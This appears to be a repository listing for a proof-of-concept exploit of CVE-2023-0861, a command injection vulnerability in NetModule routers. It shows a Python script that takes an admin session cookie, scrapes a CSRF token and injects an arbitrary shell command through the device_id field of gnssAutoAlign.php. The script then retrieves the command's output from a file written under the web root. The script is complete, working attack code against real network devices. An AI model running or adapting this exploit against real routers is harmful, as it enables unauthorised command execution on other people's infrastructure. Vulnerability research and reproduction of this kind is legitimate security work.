STRLCPY/CVE-2023-0861-POC

Analyzing and Reproducing the Command Injection Vulnerability (CVE-2023-0861) in NetModule Routers.pdf

Binary file.
NG800_Software_Release_4.5.0.104.img

Binary file.

■ ■ ■ ■ ■ ■

PoC-CVE-2023-0861.py

1	+	import re
2	+	import requests
3	+	import argparse
4	+	import urllib.parse
5	+
6	+
7	+	parser = argparse.ArgumentParser(description='CVE-2023-0861 PoC')
8	+	parser.add_argument('--url', type=str, required=True, help='URL of the vulnerable router')
9	+	parser.add_argument('--phpsessid', type=str, required=True, help='Admin\'s PHP session ID for authentication')
10	+	parser.add_argument('--payload', type=str, required=True, help='Command Injection Payload')
11	+	args = parser.parse_args()
12	+
13	+	url = f'{args.url}/admin/gnss.php'
14	+	c = {'PHPSESSID':args.phpsessid}
15	+	response = requests.get(url,cookies=c)
16	+	csrf_token = re.search(r'<input type="hidden" name="csrf-token" value="([^"]+)">', response.text).group(1)
17	+	#print(csrf_token)
18	+	data = {
19	+	'toggleAlignment': 'test',
20	+	'device_id': f'1; {args.payload} > /home/www-data/admin/img/nothing.png; 2',
21	+	'csrf-token': csrf_token,
22	+	}
23	+	#print(f'1; {urllib.parse.unquote(args.payload)} > /home/www-data/admin/img/nothing.png 2')
24	+	url = f'{args.url}/admin/gnssAutoAlign.php'
25	+
26	+	response = requests.post(url, data=data,cookies=c)
27	+
28	+	if response.status_code == 200:
29	+	results = requests.get(f'{args.url}/admin/img/nothing.png',cookies=c)
30	+	#print('done!')
31	+	print(results.content.decode())